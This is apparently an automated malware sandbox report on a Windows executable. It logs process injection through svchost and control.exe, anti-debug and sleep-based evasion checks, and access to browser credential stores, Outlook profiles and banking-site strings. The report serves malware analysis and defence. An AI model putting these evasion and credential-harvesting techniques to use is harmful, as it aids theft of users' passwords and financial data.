Source: C:\Users\user\Desktop\5by4QM3v89.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: control.exe, 00000005.00000002.2620545178.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002CEC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2027754111.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 5by4QM3v89.exe	Virustotal: Detection: 63%
Source: 5by4QM3v89.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\5by4QM3v89.exe "C:\Users\user\Desktop\5by4QM3v89.exe"
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5by4QM3v89.exe"
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5by4QM3v89.exe"	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\control.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\control.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 5by4QM3v89.exe

Static file information: File size 1225728 > 1048576

Source: 5by4QM3v89.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5by4QM3v89.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5by4QM3v89.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5by4QM3v89.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5by4QM3v89.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5by4QM3v89.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 5by4QM3v89.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rVnDkmUdXXPrwb.exe, 00000004.00000000.1757884591.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906924468.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp

Source: 5by4QM3v89.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5by4QM3v89.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5by4QM3v89.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5by4QM3v89.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5by4QM3v89.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00394B37 LoadLibraryA,GetProcAddress,

0_2_00394B37

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_0039C508 push A30039BAh; retn 0039h	0_2_0039C50D
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003B8945 push ecx; ret	0_2_003B8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026B907E push esp; retf	2_2_026B9080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026BE83F push esi; ret	2_2_026BE840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026B668B push ss; ret	2_2_026B66A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026B668F push ss; ret	2_2_026B66A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026AAE84 push 00000017h; ret	2_2_026AAE8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A17D0 push edi; ret	2_2_026A17D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A3480 push eax; ret	2_2_026A3482
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026A4DE2 push edx; retf	2_2_026A4DEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310225F pushad ; ret	2_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031027FA pushad ; ret	2_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031309AD push ecx; mov dword ptr [esp], ecx	2_2_031309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310283D push eax; iretd	2_2_03102858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310135E push eax; iretd	2_2_03101369

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_003948D7
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_00415376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00415376

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003B3187

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\5by4QM3v89.exe	API/Special instruction interceptor: Address: 1318CB4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418CD324
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418CD7E4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418CD944
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418CD504
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418CD544
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418CD1E4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418D0154
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8418CDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0317096E rdtsc

2_2_0317096E

Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 3615			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 6358			Jump to behavior

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102070

Source: C:\Users\user\Desktop\5by4QM3v89.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Windows\SysWOW64\control.exe TID: 7784	Thread sleep count: 3615 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7784	Thread sleep time: -7230000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7784	Thread sleep count: 6358 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7784	Thread sleep time: -12716000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe TID: 5872	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003F445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_003F445A
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FC6D1 FindFirstFileW,FindClose,	0_2_003FC6D1
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_003FC75C
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003FEF95
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003FF0F2
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003FF3F3
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003F37EF
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003F3B12
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003FBCBC

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003949A0

Source: j29251pK6.5.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: j29251pK6.5.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: j29251pK6.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: j29251pK6.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: j29251pK6.5.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: j29251pK6.5.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: j29251pK6.5.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: j29251pK6.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: j29251pK6.5.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: j29251pK6.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: rVnDkmUdXXPrwb.exe, 00000008.00000002.2623432439.000000000069F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2138033736.000001B0394DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: j29251pK6.5.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: j29251pK6.5.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: j29251pK6.5.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: j29251pK6.5.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: j29251pK6.5.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: control.exe, 00000005.00000002.2630210866.0000000007D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: server_stored_cvcVMwareC
Source: j29251pK6.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: j29251pK6.5.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: j29251pK6.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: j29251pK6.5.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: control.exe, 00000005.00000002.2630210866.0000000007D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareC
Source: j29251pK6.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: j29251pK6.5.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: j29251pK6.5.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: j29251pK6.5.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\Desktop\5by4QM3v89.exe

API call chain: ExitProcess graph end node

graph_0-101017

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0317096E rdtsc

2_2_0317096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_026B7883 LdrLoadDll,

2_2_026B7883

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00403F09 BlockInput,

0_2_00403F09

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00393B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00393B3A

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_003C5A7C

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00394B37 LoadLibraryA,GetProcAddress,

0_2_00394B37

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_013178A0 mov eax, dword ptr fs:[00000030h]	0_2_013178A0
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_01318F20 mov eax, dword ptr fs:[00000030h]	0_2_01318F20
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_01318F80 mov eax, dword ptr fs:[00000030h]	0_2_01318F80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312C310 mov ecx, dword ptr fs:[00000030h]	2_2_0312C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03208324 mov eax, dword ptr fs:[00000030h]	2_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03208324 mov ecx, dword ptr fs:[00000030h]	2_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03208324 mov eax, dword ptr fs:[00000030h]	2_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03208324 mov eax, dword ptr fs:[00000030h]	2_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03150310 mov ecx, dword ptr fs:[00000030h]	2_2_03150310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]	2_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]	2_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]	2_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]	2_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]	2_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]	2_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B035C mov ecx, dword ptr fs:[00000030h]	2_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]	2_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]	2_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FA352 mov eax, dword ptr fs:[00000030h]	2_2_031FA352
